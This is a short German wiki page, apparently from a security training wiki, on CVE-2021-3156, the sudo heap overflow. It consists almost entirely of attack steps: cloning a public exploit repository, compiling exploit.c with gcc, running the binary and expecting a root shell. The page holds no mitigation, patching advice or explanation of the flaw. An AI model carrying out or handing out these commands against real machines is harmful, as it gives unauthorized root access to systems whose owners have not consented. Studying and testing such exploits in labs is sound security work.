CVE-2021-3156
Version vom 8. Mai 2026, 13:50 Uhr von Thomas.will (Diskussion | Beiträge) (Die Seite wurde neu angelegt: „ ===Angriff: Root-Rechte durch Exploit=== ;Exploit herunterladen *git clone https://github.com/blasty/CVE-2021-3156.git *cd CVE-2021-3156 ;Exploit kompilieren…“)
Angriff: Root-Rechte durch Exploit
- Exploit herunterladen
- git clone https://github.com/blasty/CVE-2021-3156.git
- cd CVE-2021-3156
- Exploit kompilieren
- gcc exploit.c -o sudo_exploit
- Exploit ausführen
- ./sudo_exploit
- Erwartung
- Root-Shell erhalten.